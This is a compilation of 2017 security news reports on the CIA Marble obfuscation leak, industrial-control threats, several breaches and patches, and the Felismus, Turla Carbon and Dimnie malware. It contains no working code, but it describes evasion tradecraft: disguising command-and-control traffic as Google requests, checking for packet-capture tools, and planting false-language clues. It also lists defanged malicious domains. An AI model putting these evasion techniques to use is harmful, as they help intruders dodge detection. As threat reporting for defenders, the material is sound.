The CIA Marble Framework platform includes algorithms to insert into the malware source code multiple strings in various languages to make hard the attribution. Using such kind of techniques malware authors try to trick victims into believing that the malware was developed by American/English Vxers.

“The source code shows that Marble has test examples not just in English but also in Chinese, Russian, Korean, Arabic and Farsi.” continues Wikileaks. “This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion, but there are other possibilities, such as hiding fake error messages.”

Marble Framework does not contain any vulnerabilities or exploits.

The Marble dump also includes a deobfuscator to reverse CIA text obfuscation, using it experts can identify patterns of attacks conducted by the CIA and attribute previous hacking attacks and malicious codes to the Agency. Marble was in use at the CIA during 2016, in 2015 the cyber spies were using the 1.0 version.


Threat Landscape for Industrial Automation Systems, H2 2016
1.4.2017 Kaspersky ICS

The Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT) is starting a series of regular publications about our research devoted to the threat landscape for industrial organizations.

All statistical data used in the report was obtained using Kaspersky Security Network (KSN), a distributed antivirus network. Data was received from those KSN users who consented to have their data collected anonymously.

The research carried out in the second half of 2016 by Kaspersky Lab ICS CERT experts clearly demonstrates a number of trends in the evolution of industrial enterprise security.

On average, in the second half of 2016 Kaspersky Lab products across the globe blocked attempted attacks on 39.2% of protected computers that Kaspersky Lab ICS CERT classifies as being part of industrial enterprise technology infrastructure.

This group includes computers that run Windows and perform one or more of the following functions:

Supervisory Control and Data Acquisition (SCADA) servers,
Data storage servers (Historian),
Data gateways (OPC),
Stationary engineer and operator workstations,
Mobile engineer and operator workstations,
Human Machine Interface (HMI).
The group also includes computers of external 3-d party contractors, SCADA vendors and system integrators as well as internal SCADA administrators.

Every month, an average of one industrial computer in five (20.1%) is attacked by malware. We have seen stable growth in the percentage of industrial computers attacked since the beginning of our observations, highlighting the importance of cybersecurity issues.

 

Percentage of industrial computers attacked by month (second half of 2016)

Isolation of industrial networks can no longer be considered an effective protective measure. The proportion of malware infection attempts involving portable media, infection of backup copies, use of sophisticated schemes for transferring data from isolated networks in complex attacks – all of this demonstrates that risks cannot be avoided by simply disconnecting a system from the Internet.
 

Sources of threats blocked on industrial computers (second half of 2016)

Remarkably, there is very little difference between the rankings of malware detected on industrial computers and those of malware detected on corporate computers. We believe that this demonstrates the absence of significant differences between computers on corporate networks and those on industrial networks in terms of the risk of chance infections. However, it is obvious that even a chance infection on an industrial network can lead to dangerous consequences.
 

Distribution of industrial computers attacked by classes of malware used in attacks (second half of 2016)

According to our data, targeted attacks on companies in different industrial sectors are increasingly common. These are organized attacks that can target one enterprise, several enterprises, companies in one industrial sector or a broad range of industrial enterprises.

The Kaspersky Lab ICS CERT detected a series of phishing attacks which began no later than June 2016 and which are still active. The attacks target primarily industrial companies – metallurgical, electric power, construction, engineering and others. We estimate the number of companies attacked at over 500 in more than 50 countries around the world.

None of the malicious programs used in the attack – trojan spies and backdoors from different families, such as ZeuS, Pony/FareIT, Luminosity RAT, NetWire RAT, HawkEye, and ISR Stealer – are unique to this malicious campaign. They are all very popular among cybercriminals. However, these programs are packed with unique modifications of VB and MSIL packers that are used only in this attack. Our experience of investigating targeted attacks shows that cyberespionage is often used to prepare subsequent attack stages.

One quarter of all targeted attacks uncovered by Kaspersky Lab in 2016 targeted, among others, different industries – machine building, energy, chemical, transport and others.

In 2016, Kaspersky Lab evaluated the current state of IT security components in the industrial control systems of different vendors. As a result of this research, 75 vulnerabilities were identified in ICS components. 58 of them were marked as maximum critical vulnerabilities (CVSS v3.0 severity score 7.0 or higher).

 

Distribution of vulnerabilities uncovered by Kaspersky Lab in 2016 according to the ways in which they can be used

Of the 75 vulnerabilities identified by the middle of March 2017 by Kaspersky Lab, industrial software vendors closed 30.

The approach of industrial software vendors to closing vulnerabilities and the situation with fixing known vulnerabilities at enterprises is by no means reassuring. The approach to addressing vulnerabilities as part of the software development cycle has not yet been sufficiently refined: vendors do not prioritize the closing of identified vulnerabilities based on their severity, they prefer to fix vulnerabilities in the next release of their product rather than releasing a fix or patch that is critical from an IT security viewpoint.

Another issue is the installation of updates and security patches at enterprises. Based on our research and ICS IT security audits, we believe that for ICS owners, the process of installing critical updates is either too labor-intensive or not a high-priority task in the system’s overall lifecycle. As a result, at some enterprises critical updates of various industrial system components are not installed for years, making these enterprises vulnerable in the event of cyberattacks.

The industrial network is increasingly similar to the corporate network – both in terms of usage scenarios and in terms of technologies used. New technologies are being used that improve process transparency and efficiency at the enterprise level, as well as providing flexibility and fault tolerance of the functions performed at medium and lower industrial automation levels. The upshot of all this is that the cyber threat landscape for industrial systems is increasingly similar to the threat landscape for corporate networks. Consequently, we can expect not only the emergence of new threats specifically designed for industrial enterprises but also the evolution of existing, traditional IT threats, which involves their adaptation for attacks against industrial enterprises and physical world objects.

The emergence of large-scale malicious campaigns targeting industrial enterprises indicates that black hats see this area as promising. This is a serious challenge for the entire community of industrial automation system developers, owners and operators of such systems, and security vendors. We are still remarkably languid and slow-moving in most cases, which is fraught with dangers under the circumstances.


WikiLeaks Reveals 'Marble' Source Code that CIA Used to Frame Russia and China
1.4.2017 thehackernews BigBrothers
cia-marble-framework-malware-source-code-obfuscator
WikiLeaks published hundreds of more files from the Vault 7 series today which, it claims, show how CIA can mask its hacking attacks to make it look like it came from other countries, including Russia, China, North Korea and Iran.
Dubbed "Marble," the part 3 of CIA files contains 676 source code files of a secret anti-forensic Marble Framework, which is basically an obfuscator or a packer used to hide the true source of CIA malware.
The CIA's Marble Framework tool includes a variety of different algorithm with foreign language text intentionally inserted into the malware source code to fool security analysts and falsely attribute attacks to the wrong nation.
The leaked files indicate that the Marble's source code includes Chinese, Russian, Korean, Arabic and Farsi languages, as well as English, which shows that the CIA has engaged in clever hacking games.
"Marble is used to hamper[ing] forensic investigators and anti-virus companies from attributing viruses, trojans and hacking attacks to the CIA," says the whistleblowing site.
"...for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion," WikiLeaks explains.
The released source code archive also contains a deobfuscator to reverse CIA text obfuscation.

Since the Marble framework has now been made public, forensic investigators and anti-virus firms would be able to connect patterns and missing dots in order to reveal wrongly attributed previous cyber attacks and viruses.
So far, Wikileaks has revealed the "Year Zero" batch which uncovered CIA hacking exploits for and security bugs in popular hardware and software, and the "Dark Matter" batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs.
While WikiLeaks suggests that Marble was in use as recently as 2016, the organization does not provide any evidence to back this claim. Experts are still analyzing the Marble release, so there's no need to get too excited at this moment.
The White House has condemned the revelations made by Wikileaks, saying that those responsible for leaking classified information from the agency should be held accountable by the law.


Job Seekers' Data Stolen in Hack of McDonald's Canada

1.4.2017 securityweek Crime

McDonald's Canada said Friday hackers stole the personal data of about 95,000 job seekers from the fast food chain's recruitment website over the past three years.

The data was from people who had sought work with the company since March 2014, and the company said it has launched an investigation into the hack.

The web portal targeted in the attack, which has been shut down, collected job candidates' names, addresses, emails, telephone numbers, employment histories and other relevant data, the company said in a statement.

More sensitive data such as health information, social insurance numbers and banking information is not collected during the recruiting process and were not affected, the company said.

There were no signs so far that the stolen information had been misused, the company said, and apologized to those affected.

"The careers webpage will remain shut down until the investigation is complete and appropriate measures are taken to ensure that this type of security breach does not happen again," the statement said, asking future job seekers to apply in person.


German Military to Launch Cyber Command

1.4.2017 securityweek  BigBrothers

Germany's armed forces Saturday launch a cyber command, with a status equal to that of the army, navy and air force, meant to shield its IT and weapons systems from attack.

Military planners fear that wars of the future will start with cyber attacks against critical infrastructure and networks, extensive online espionage and sabotage. The Bundeswehr's new Cyber and Information Space (CIR) Command, based in the former West German capital of Bonn, will start off with 260 IT specialists but grow to 13,500 military and civilian personnel by July.

With the new digital force, Germany is taking a leading role among NATO allies, its new commander, Lieutenant General Ludwig Leinhos, told news weekly Focus.

Leinhos said the main tasks would be to operate and protect the military's own IT infrastructure and computer-assisted weapons systems, as well as surveillance of online threats.

He said the centre would also develop and war-game offensive capabilities because "in order to be able to defend yourself, you have to know the options for attack".

However, any full-scale cyber attacks abroad would have to be approved by the German parliament, just like any other military mission.

The security of national and government IT systems, meanwhile, remains the responsibility of the interior ministry which oversees the domestic security agency that handles counterespionage.

The German government has been sensitized to cyber security since the parliament was attacked last year, with security sources suspecting Russian hackers behind the attack.

Defense Minister Ursula von der Leyen had announced the creation of the cyber command two years ago to protect the military from increasing numbers of online attacks.

The defense ministry said that in this year's first nine weeks alone, the IT systems of the Bundeswehr had been targeted more than 280,000 times.

Leinhos said that "we are in a constant race between the development of attack options and defensive capabilities".


Schneider Electric Patches Flaws in Modicon, Wonderware Products

31.3.2017 securityweek Vulnerebility
Schneider Electric has released software and firmware updates to address several vulnerabilities affecting some of the company’s Wonderware and Modicon products.

According to advisories released by Schneider Electric and ICS-CERT, the Access Anywhere extension of the Wonderware InTouch HMI visualization software is affected by four medium and high severity vulnerabilities.

The list includes a cross-site request forgery (CSRF) on the Gateway component (CVE-2017-5156), an information disclosure flaw that could lead to the exposure of credentials (CVE-2017-5158), and a weakness related to the use of outdated cipher suites and improper verification of SSL certificates (CVE-2017-5160).

The fourth vulnerability, only mentioned in Schneider’s advisory, has been described as a flaw that allows an attacker to escape remote InTouch applications and launch other processes.

The security holes affect Wonderware InTouch Access Anywhere 2014 R2 SP1b (11.5.2) and prior, and they have been addressed with the release of Wonderware InTouch Access Anywhere 2017 (17.0.0). The vendor has also provided recommendations for mitigating the vulnerabilities.

Three medium and high severity vulnerabilities have also been identified in Schneider Electric’s Modicon programmable logic controllers (PLCs).

The flaws are related to the exposure of login credentials during transmission (CVE-2017-6028), predictable authentication cookies (CVE-2017-6026), and insufficiently random TCP initial sequence numbers (CVE-2017-6030). Schneider Electric has published separate advisories for each of the issues.

The security holes affect Modicon M221, M241 and M251 PLCs. The vendor has released firmware updates that address the weaknesses related to insufficiently random values, and provided recommendations for reducing the risk of exploitation for the credentials protection vulnerability.

In early March, Schneider also released an advisory to warn customers of a flaw that can be exploited to execute arbitrary commands on Modicon PLCs.

The company also informed users this month about a high severity denial-of-service (DoS) vulnerability affecting the Flexera FlexNet Publisher component used in the Schneider Electric Floating License Manager. This license manager is used by both the PowerSCADA Expert and PlantStruxure PES products.


WikiLeaks Releases CIA Tool Used to Impede Malware Attribution

31.3.2017 securityweek BigBrothers
WikiLeaks has released information and source code for a framework allegedly used by the U.S. Central Intelligence Agency (CIA) to make analysis of its tools and attribution more difficult.

The whistleblower organization on Friday made public 676 source code files of the Marble Framework. According to WikiLeaks, version 1.0 of the framework was released in 2015, and the CIA has continued using it during 2016.

Files that appear to be part of the official Marble Framework documentation describe it as a framework “designed to allow for flexible and easy-to-use obfuscation when developing tools.” These types of techniques have been used by many malware developers to hinder researchers.

The first round of Vault 7 files released by WikiLeaks showed that the CIA learned from the NSA’s mistakes after the intelligence agency’s Equation Group was exposed by security researchers. CIA employees apparently determined that the use of custom cryptography was one of the NSA’s biggest mistakes, as it allowed researchers to link different pieces of malware to the same developer.

The Marble framework allows obfuscation of a tool using a random technique to prevent forensics investigators and security vendors from linking it to a specific developer. Marble users can also select the algorithm they want to use or configure the application to omit certain algorithms.

Charles R. Smith, CEO of Softwar Inc, pointed out that Marble leverages the Bouncy Castle cryptography APIs.

During its analysis of the Marble source code, WikiLeaks identified test examples written in Chinese, Russian, Korean, Arabic and Farsi, which suggests that the agency may have used the framework to trick investigators into believing that its tools were developed by individuals speaking one of these languages.

CIA obfuscation tool source code

“This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion,” WikiLeaks said. “But there are other possibilities, such as hiding fake error messages.”

The source code files made available by WikiLeaks also include a deobfuscation tool.

WikiLeaks has offered to share the exploits it has obtained with tech firms, but many companies have not agreed to the organization’s conditions. U.S. officials also hinted that using the leaked information could have legal repercussions.

While the available information has led to the discovery of some zero-day vulnerabilities, cybersecurity vendors and other tech companies determined that many of the flaws have already been patched. Last week, WikiLeaks published files focusing on Mac and iPhone exploits, but Apple claimed most of the security holes had been addressed.

The CIA has refused to comment on the authenticity of the leaked documents. However, the agency pointed out that its mission is to collect intelligence from overseas entities, and claimed that it does not spy on individuals in the U.S.


Telegram Messenger Adds AI-powered Encrypted Voice Calls
31.3.2017 thehackerews Privacy 

Joining the line with rival chat apps WhatsApp, Viber, Facebook Messenger, and Signal, the Telegram instant messaging service has finally rolled out a much-awaited feature for the new beta versions of its Android app: Voice Calling.
And what's interesting? Your calls will be secured by Emojis, and quality will be better using Artificial Intelligence.
No doubt the company brought the audio calling feature quite late, but it's likely because of its focus on security — the voice calls on Telegram are by default based on the same end-to-end encryption methods as its Secret Chat mode to help users make secure calls.
Unlike Signal or WhatsApp, Telegram does not support end-to-end encryption by default; instead, it offers a 'Secret Chat' mode, which users have to enable manually, to completely secure their chats from prying eyes.
However, the voice calling feature in Telegram supports end-to-end encryption by default, enabling users to secure their chats in a way that no one, not even Telegram or law enforcement, can intercept your calls.
Emoji-Based Secure Key Exchange Mechanism
Telegram features an interesting key exchange mechanism to authenticate users and make sure their calls are even more secure: Users are required just to compare four emoji.
While making a call, you will see four emoji on your mobile screen and so the recipient. If the emoji on your screen match the recipient's, your connection is secure!
"The key verification UI we came up with in 2013 to protect against man-in-the-middle attacks served well for Telegram (and for other apps that adopted it), but for Calls, we needed something easier," Telegram said in a blog post published Thursday.
"That's why we've improved the key exchange mechanism. To make sure your call is 100% secure, you and your recipient just need to compare four emoji over the phone. No lengthy codes or complicated pictures!"
Voice Calls — Encrypted, Super-Fast and AI-Powered
What's more? Telegram ensures its users that the audio quality of the voice calls has kept as high as possible by using a peer-to-peer connection, the best audio codecs, and Artificial Intelligence.
Developers say that audio quality of the call is "superior to any of our competitors" by including an AI neural network.
So, each time you make a Voice Call, your Telegram app's AI neural network will optimize dozens of parameters based on technical information of your device and network such as network speed, ping times, packet loss percentage, to adjust the quality of your call and improve future calls on the given device and network.
"These parameters can also be adjusted during a conversation if there's a change in your connection," the company states. "Telegram will adapt and provide excellent sound quality on stable WiFi — or use less data when you walk into a refrigerator with bad reception."
Note: AI doesn't have access to the contents of the conversation, so your calls are completely secure.
Telegram Offer Complete Control & Video Compression
Unlike WhatsApp and Facebook, Telegram lets you control "who can and who can't call you with granular precision."
If you don't want anyone bothering you, you can simply switch voice calls off altogether, blocking anyone and even everyone from calling you.
Telegram also offers users direct control over the quality of videos they shared over the platform. You can adjust the compression and see the quality of the video before sending it to your friends.
You can also set the video compression rate as the default setting for all your future video uploads.
Telegram version 3.18 which includes new features, such as Voice Calling, is free to download for iPhone on the App Store and Android phone on the Google Play Store.


Cloudové služby jsou pohodlné. Obnášejí ale i rizika

31.3.2017 Novinky/Bezpečnost Zabezpečení
Minulý týden se rozhořela kauza okolo hackerů, kteří vyhrožují Applu, že smažou data stovek miliónů uživatelů služby iCloud. To opět rozvířilo debatu o tom, jak důležitá je bezpečnost při ukládání fotografií, videí a dalších dat na internetu.
Služba iCloud je velmi populární. Už při prvním spuštění nabízí uživateli možnost zálohovat kontakty, zprávy, fotografie a další soubory automaticky na vzdálený server (cloud). To se hodí především v případě, kdy mobil nebo tablet ztratíte. Do nového přístroje jednoduše zadáte své přístupové údaje a všechna data máte okamžitě zpět, o nic nepřijdete.

Jenže cloud představuje také jisté riziko, na které bezpečnostní experti pravidelně poukazují již několik posledních let. Tím, že data nemáte přímo u sebe, se k nim může dostat i někdo cizí. Stačí znát váš e-mail a heslo. A to neplatí pouze o iCloudu, ale také o dalších podobných službách, které provozují konkurenční společnosti.

Nepodceňovat sílu hesla
Riziko přitom nehrozí pouze v případě, že heslo někomu prozradíte. Hacker může na heslo jednoduše přijít. Speciální programy hackerského podsvětí dokážou čtyřmístné heslo, složené z číslic od nuly do devítky, prolomit za dvě minuty. Výkon dvoujádrových a čtyřjádrových procesorů totiž dovolí za jednu vteřinu prověřit na běžné počítačové sestavě až 100 možných kombinací.

Problém nastává také ve chvíli, kdy stejné heslo používáte u více služeb, například u e-mailu, nejrůznějších diskusních fór či sociálních sítí. Pokud na některé z těchto služeb dojde k úniku hesel, počítačoví piráti se pak velmi snadno dostanou i do dalších služeb – například přímo na server, kam se automaticky ukládají soukromé snímky z mobilu nebo tabletu. Jednoduše heslo na nejpoužívanějších službách vyzkoušejí.

Je tedy nutné si uvědomit, že hesla jsou zpravidla první linií účinné ochrany před odcizením citlivých osobních dat. Čím delší a složitější heslo, tím lépe. Vhodné je kombinovat malá i velká písmena a čísla, případně také speciální znaménka.

Vhod přijde dvojité zabezpečení
Zabezpečit cloudový účet je navíc možné prostřednictvím sofistikovanějších metod, než je pouze silné heslo. Někteří poskytovatelé těchto služeb nabízejí například možnost zasílat unikátní kód při každém přihlášení.

Pro přístup k datům tak nestačí znát pouze váš e-mail a heslo. Je potřeba mít také váš telefon, na který přijde přihlašovací kód. Podobný systém zabezpečení je dnes již samozřejmostí při platbách přes on-line bankovnictví.

Výjimkou není ani možnost detekce „nezvaných návštěvníků“. Ve chvíli, kdy se někdo pokusí získat přístup k vašim datům z jiného přístroje, než jaký jste při první instalaci potvrdili, přijde vám na e-mail automaticky upozornění. Data vám tato funkce sice neochrání, pokud k nim již útočník získal přístup, na druhou stranu ale tak nezíská žádný další citlivý obsah, který byste mohli na cloud nahrát.

Riziko představují i samotné mobily a tablety
Přijít o data uložená v mobilech a tabletech ale můžete i v případě, že žádný cloud nepoužíváte. Většina lidí totiž u nich, na rozdíl od klasických počítačů a notebooků, nepoužívá žádný bezpečnostní software. A právě proto se na mobilní zařízení zaměřují kybernetičtí zločinci stále častěji.

V praxi se jim tak může podařit propašovat do tabletu nebo smartphonu nějaký škodlivý virus, který jim umožní získat vládu nad napadeným přístrojem a tím jim zpřístupní i všechna uložená data. Bez antiviru nemá běžný uživatel prakticky žádnou šanci si všimnout, že byl jeho přístroj infikován.

Každý tablet a chytrý telefon by tak měl být vybaven bezpečnostním softwarem, který bude všechny hrozby neustále hlídat. Uživatelé by neměli zapomínat na pravidelné stahování všech bezpečnostních záplat, a to pro samotný operační systém i doinstalované programy. Nejrůznější trhliny v softwaru totiž útočníci také zneužívají k útokům.


IPhony a iPady mohou napadnout hackeři. Stačí se připojit k wi-fi

31.3.2017 Novinky/Bezpečnost Apple
Kritickou bezpečnostní trhlinu obsahuje operační systém iOS, který využívají chytré telefony iPhone a počítačové tablety iPad. Kyberzločinci ji mohou zneužít k tomu, aby do zařízení propašovali prakticky libovolný škodlivý kód. Stačí, aby byli připojeni ke stejné wi-fi jako jejich oběť, například na zdarma dostupné síti v kavárně nebo obchodním centru.
Chyba se týká pouze lidí, kteří využívají starší verzi iOS. (Ilustrační foto)
Chyba se týká pouze lidí, kteří využívají starší verzi iOS. (Ilustrační foto)
FOTO: mif, Novinky
Dnes 16:08
Jak snadno je trhlina zneužitelná demonstroval na hackerské konferenci Black Hat výzkumník Marco Grassi z bezpečnostní společnosti Tencent.

„Kyberzločinec využije systémové aplikace WebSheet, která po připojení k wi-fi automaticky načte libovolný tzv. captive portál. Na ten vloží některou zranitelnost WebKitu a tím vyvolá aplikaci iOS Diagnostics, která již běží mimo sandbox. iOS Diagnostics načítá URL, kterou útočník falzifikuje, a skrz ni kompromituje zařízení,“ popsal technickou stránku útoku Pavel Bašta, bezpečnostní analytik Národního kybernetického týmu CSIRT.CZ.

Zjednodušeně řečeno útočníkovi stačí, aby se mu podařilo připojit na stejnou wi-fi síť jako jeho oběti. Poté může zařízení s operačním systémem iOS podstrčit podvodnou stránku, prostřednictvím které pak propašuje do zařízení libovolný škodlivý kód – klidně jej i ovládne na dálku.

Je však nutné zdůraznit, že v ohrožení jsou pouze uživatelé, kteří nemají aktualizovaný svůj operační systém. Nejnovější verze iOS totiž kyberzločincům tato zadní vrátka do iPhonů a iPadů zavřela.

Měsíc plný chyb
Březen pro společnost Apple rozhodně růžový nebyl. Americký počítačový gigant totiž vydal opravy pro více než 200 bezpečnostních chyb, což je naprostý rekord.

Trhliny přitom nebyly objeveny pouze v systémech pro mobilní zařízení, ale například i v platformách pro stolní počítače. Hrozba se navíc týká také uživatelů, kteří žádné zařízení s platformou od Applu nevlastní. Trhliny obsahuje totiž například i webový prohlížeč Safari, jenž je dostupný i pro stroje s Windows.

S ohledem na množství objevených zranitelností by uživatelé zcela jistě neměli s instalací aktualizací otálet. V některých případech totiž již útočníci chyby zneužívají.


Modular Felismus RAT Emerges

31.3.2017 securityweek Virus
A newly discovered piece of malware features a modular design and has been used in highly targeted campaigns, Forcepoint security researchers reveal.

Dubbed Felismus, the malware is a well-written Remote Access Trojan (RAT) believed to have been created by professional cybercriminals. The threat packs numerous anti-analysis capabilities (including advanced encryption of network communication) and shows good 'operational hygiene' relating to the re-use of email addresses and other traceable artefacts, Forcepoint says.

The first available samples feature filenames mimicking that of Adobe's Content Management System (AdobeCMS.exe) and emerged several weeks ago, but the malware’s attacks can be dated six months before. The attackers behind the malware and their targets remain opaque for the time being, but the RAT’s libraries appear to be actively exploited and the spotted attacks are believed to be part of a larger campaign.

The threat is capable of self-updating, while also being able to identify and evade a large number of anti-virus products, most of which are well-known brands. The malware packs capabilities typical of RATs, such as file upload, file download, file execution, and shell (cmd.exe) command execution. The malware can also create text files on the local machine.

At the time of publishing, 31 of 61 anti-virus products on VirusTotal detected the threat based on the hash provided by ForcePoint.

The security researchers note that the malware’s command and control (C&C) infrastructure is active and appears to be maintained, while also revealing that the RAT uses at least three separate encryption methods for its traffic, depending on the type of message.

A series of domains associated with the threat were found to return a fake WordPress.org page from 2013, and to feature falsified details, such as invalid Hong Kong-based telephone numbers and inexistent street addresses. The email addresses used to register the domains haven’t been used anywhere else online, which confirms the degree of professionalism and good 'operational hygiene' these cybercriminals are using.

“The malware analysed appears to be both modular and well-written, strongly suggesting that skilled attackers are responsible, while its apparent scarcity in the wild implies that it is likely highly targeted. On top of this, the good 'operational hygiene' relating to the re-use of email addresses and other similarly traceable artefacts suggests coordinated, professional actors and, at the time of writing, there is little to link it with any known campaigns (APT-linked or otherwise),” Forcepoint says.

The security researchers say that, while the malware is well-written, the use of a folder name 'datas' and a typo in the function name 'GetCurrtenUserName' suggest that English might not be the authors’ first language. They also discovered that the available malware samples appear to have been compiled using a December 2014 version of the open-source TDM-GCC compiler suite.

The analyzed sample performed a small number of functions and generated only several unique log file entries, which could be indicative of the fact that either the campaign is currently dormant or the malware behaves differently depending on the infected machine. The researchers also noticed that a C&C IP address appeared to selectively block one of the security firm’s exit IPs during research.

“If the other modules and capabilities associated with the malware remain a matter of speculation, so too do the intended target(s). Of the five domains hosted on the C&C IP address identified within this post, three - cosecman[]com, nasomember[]com, and unmailhome[]com - have potential associations with the financial services sector; however, under this theory the naming of the remaining two domains - maibars[]com and mastalib[]com - remain unexplained,” Forcepoint concludes.


Turla Group Improves Carbon Backdoor

31.3.2017 securityweek Virus
The Russia-linked threat group known as Turla has continued to make improvements to its Carbon second-stage backdoor, with new versions released on a regular basis, ESET reported on Thursday.

Turla has been active since at least 2007 and is believed to be responsible for several high-profile attacks, including the ones aimed at Swiss defense firm RUAG and the U.S. Central Command. The group is also known as Waterbug, KRYPTON and Venomous Bear, and some of its primary tools are tracked as Turla (Snake and Uroburos) and Epic Turla (Wipbot and Tavdig).

Carbon, also known as Pfinet, is another tool used by the group and ESET has described it as a lite version of Uroburos. Carbon is a second-stage backdoor that is typically deployed after the reconnaissance phase of an attack, which involves malware such as Tavdig. Carbon was also used in the attack aimed at RUAG.

According to ESET, Carbon has several components, including a dropper, a command and control (C&C) communications element, an orchestrator, and a loader that executes the orchestrator. These components are mostly DLL files, except for the loader, which is an EXE file.

The security firm has identified several versions of Carbon compiled last year; the most recent has a compilation date of October 21, 2016.

ESET pointed out that Turla has been making changes to its tools once they are exposed. In the case of Carbon, file names and mutexes have been modified in version 3.8, released in the summer of 2016, compared to version 3.7, which had been used since 2014.

The main component of the Carbon framework is the orchestrator, which is used to inject the C&C communications library into a legitimate process, and dispatch the tasks received via the C&C library to other computers on the network. Before C&C communications are initiated, the malware checks the infected system for the presence of packet capture software, such as Wireshark and Tcpdump.

In addition to changed file names and mutexes, ESET said the newer versions of Carbon use more encryption, including for files and the names of modules, functions and processes.

In February, Kaspersky Lab revealed that the Turla group had started using a new piece of JavaScript malware to profile victims.


Linux Kernel Flaw Disclosed at Pwn2Own Patched

31.3.2017 securityweek Vulnerebility
The Linux kernel vulnerability leveraged at the Zero Day Initiative’s Pwn2Own 2017 competition to hack Ubuntu has been patched.

The flaw was disclosed at the event by researchers at Beijing-based enterprise security firm Chaitin Tech. The exploit, which earned the hackers $15,000, was part of the only attempt to break Ubuntu at this year’s Pwn2Own.

The vulnerability, tracked as CVE-2017-7184, has been described as an out-of-bounds heap access weakness that can be exploited to cause a denial-of-service (DoS) condition or to execute arbitrary code. A local attacker can exploit the flaw to escalate privileges on the system.

“The specific flaw exists within the handling of xfrm states,” ZDI explained in its advisory. “The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer.”

The vulnerability was addressed in the Linux kernel a few days after Pwn2Own ended. Ubuntu has released fixes and other Linux distributions are working on patches as well.

Red Hat has classified it “high severity,” but pointed out that the flaw cannot be exploited for privilege escalation on default or common configurations of Red Hat Enterprise Linux 5, 6 and 7.

Mozilla and VMware have also patched the Firefox and Workstation vulnerabilities disclosed at Pwn2Own, and ZDI has made its advisories public for these security holes.


Turla hacking group continues to improve its Carbon backdoor
31.3.2017 securityaffairs Virus

The Russian group Turla has continued to improve its Carbon backdoor, experts from ESET detected new versions released on a regular basis.
The Russian APT group known as Turla (also known as Waterbug, KRYPTON and Venomous Bear) has continued to improve its Carbon backdoor, experts from ESET detected new versions released on a regular basis.

Carbon is a second-stage backdoor that is used after an initial reconnaissance phase of an attack, it involves malware such as Tavdig.

The Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using Icedcoffee, a JavaScript payload delivered via macro-enabled Office documents.

Last time the researchers reported Turla‘s activities was February 2017, when experts at Kaspersky Lab have discovered a new piece of JavaScript malware linked to the group targeting organizations in Greece, Qatar, and Romania.

Turla has been active since at least 2007, the hackers launched several high-profile attacks against targets worldwide, including the ones aimed at Swiss defense firm RUAG and the U.S. Central Command.

Carbon, aka Pfinet, is once of the tool in the arsenal of the hacking crew, researchers from ESET described it as a lite version of Uroburos.

Carbon is a second-stage backdoor that is typically deployed after the reconnaissance phase of an attack, it has several components, including a dropper, a command and control (C&C) communications element, an orchestrator, and a loader that executes the orchestrator.

The orchestrator is used to inject the C&C communications library into a legitimate process, and dispatch the tasks received via the C&C library to other bots that are located on the network.

Turla

ESET has identified several versions of Carbon compiled last year; the most recent one was compilated on October 21, 2016. The newer versions of the Carbon malware make a massive use of encryption.

Almost any component is a DLL file, except for the loader, which is an EXE file.

“The Turla group is known to be painstaking and work in stages, first doing reconnaissance on their victims’ systems before deploying their most sophisticated tools such as Carbon.

A classic Carbon compromise chain starts with a user receiving a spearphishing email or visiting a previously compromised website, typically one that the user visits regularly — a technique known as a watering hole attack.” reads the analysis shared by ESET.
“After a successful attack, a first stage backdoor — such as Tavdig or Skipper — is installed on the user machine. Once the reconnaissance phase is over, a second stage backdoor, like Carbon, is installed on key systems.”
Threat actor behind Turla have modified their tools everytime they were detected in the wild. Researchers observed that in the case of Carbon, the hackers changed file names and mutexes in the version 3.8 released in the summer of 2016.

Experts noticed that before the malware start communicating with C&C, it checks the infected system for the presence of packet capture software, such as Wireshark and Tcpdump.

“Before communicating with the C&C server or with other computers, the malware ensures that none of the most common packet capture software is running on the system:
TCPdump.exe
windump.exe
ethereal.exe
wireshark.exe
ettercap.exe
snoop.exe
dsniff.exe”


Owners of GitHub repositories targeted by the Dimnie data-stealer malware
31.3.2017 securityaffairs Virus

Since mid-January, attackers have targeted owners of GitHub repositories with the Dimnie data-stealer malware. It is a relatively unknown threat actor.
Attackers have targeted developers having Github repositories with a data-stealing malware called Dimnie. The malicious code includes keylogging features and modules that capture screenshots.

The Dimnie malware was spotted by researchers at Palo Alto Networks in mid-January when an unknown number of developers were targeted with emails purporting to be job offers. The malicious messages used weaponized .doc files containing an embedded malicious macro that executed a PowerShell command that would start the attack by downloading and executing the malicious code.

The Dimnie data stealer has been in circulation since 2014 targeting primarily Russian-speaking targets. The researchers have no idea how widespread the malware based campaign was, the motivation for the attack is also a mystery. Probably the attackers were searching something of interest among the huge number of projects hosted on the platform.

“Dimnie, the commonly agreed upon name for the binary dropped by the PowerShell script above, has been around for several years. Palo Alto Networks has observed samples dating back to early 2014 with identical command and control mechanisms. The malware family serves as a downloader and has a modular design encompassing various information stealing functionalities.” reads the analysis published by Palo Alto Networks. “Each module is injected into the memory of core Windows processes, further complicating analysis. During its lifespan, it appears to have undergone few changes and its stealthy command and control methods combined with a previously Russian focused target base has allowed it to fly under the radar up until this most recent campaign.”

Experts believe that the attack was carried out by a “relatively unknown threat” outside of the Russian-speaking world.

Dimnie disguised the HTTP requests to the command and control server structure in a GET request to a defunct Google service called Google PageRank. The researchers discovered an IP address in a DNS lookup request preceding the GET request was that the real destination IP for the follow-up HTTP request.

“Sending the request to an entirely different server is not complicated to achieve, but how many analysts would simply see a DNS request with no related subsequent traffic? That is precisely what Dimnie is relying upon to evade detections,”

The attackers used a similar technique to exfiltrate data, the request, in fact, is disguised in a POST request to Google.

